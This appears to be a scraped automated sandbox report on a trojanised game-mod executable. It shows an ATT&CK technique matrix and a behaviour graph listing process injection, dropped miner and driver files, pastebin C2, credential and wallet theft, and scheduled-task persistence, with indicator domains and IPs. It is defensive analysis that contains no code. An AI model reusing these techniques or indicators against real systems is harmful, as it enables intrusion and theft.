                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Windows Service
                  11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory11
                  File and Directory Discovery
                  Remote Desktop Protocol41
                  Data from Local System
                  13
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  211
                  Process Injection
                  4
                  Obfuscated Files or Information
                  Security Account Manager44
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  21
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell
                  Login Hook1
                  Scheduled Task/Job
                  2
                  Software Packing
                  NTDS371
                  Security Software Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  4
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging125
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials261
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636791 Sample: Kiddion's Modest Menu v.1.0.0.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 60 pastebin.com 2->60 62 mrodularmall.top 2->62 64 2 other IPs or domains 2->64 82 Found malware configuration 2->82 84 Antivirus detection for URL or domain 2->84 86 Antivirus / Scanner detection for submitted sample 2->86 90 11 other signatures 2->90 11 Kiddion's Modest Menu v.1.0.0.exe 1 2->11         started        signatures3 88 Connects to a pastebin service (likely for C&C) 60->88 process4 signatures5 98 Injects a PE file into a foreign processes 11->98 14 Kiddion's Modest Menu v.1.0.0.exe 1 11->14         started        19 WerFault.exe 21 16 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 68 185.215.113.51, 49735, 49737, 49738 WHOLESALECONNECTIONSNL Portugal 14->68 70 mrodularmall.top 104.21.64.1, 443, 49734 CLOUDFLARENETUS United States 14->70 72 citydisco.bet 188.114.96.3, 443, 49714, 49716 CLOUDFLARENETUS European Union 14->72 58 C:\Users\user\...\1C2NX3IUVJPXMLDGP.exe, PE32 14->58 dropped 74 Query firmware table information (likely to detect VMs) 14->74 76 Found many strings related to Crypto-Wallets (likely being stolen) 14->76 78 Tries to harvest and steal ftp login credentials 14->78 80 2 other signatures 14->80 23 1C2NX3IUVJPXMLDGP.exe 15 31 14->23         started        file8 signatures9 process10 dnsIp11 66 pastebin.com 172.67.19.24, 443, 49736 CLOUDFLARENETUS United States 23->66 54 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 23->54 dropped 56 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 23->56 dropped 94 Multi AV Scanner detection for dropped file 23->94 96 Sample is not signed and drops a device driver 23->96 28 cmd.exe 1 23->28         started        31 cmd.exe 23->31         started        33 cmd.exe 23->33         started        file12 signatures13 process14 signatures15 100 Encrypted powershell cmdline option found 28->100 102 Uses schtasks.exe or at.exe to add and modify task schedules 28->102 104 Uses powercfg.exe to modify the power settings 28->104 106 Modifies power options to not sleep / hibernate 28->106 35 powershell.exe 23 28->35         started        38 conhost.exe 28->38         started        40 powercfg.exe 1 28->40         started        50 4 other processes 28->50 42 conhost.exe 31->42         started        44 schtasks.exe 31->44         started        46 conhost.exe 33->46         started        48 schtasks.exe 33->48         started        process16 signatures17 92 Loading BitLocker PowerShell Module 35->92 52 WmiPrvSE.exe 35->52         started        process18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.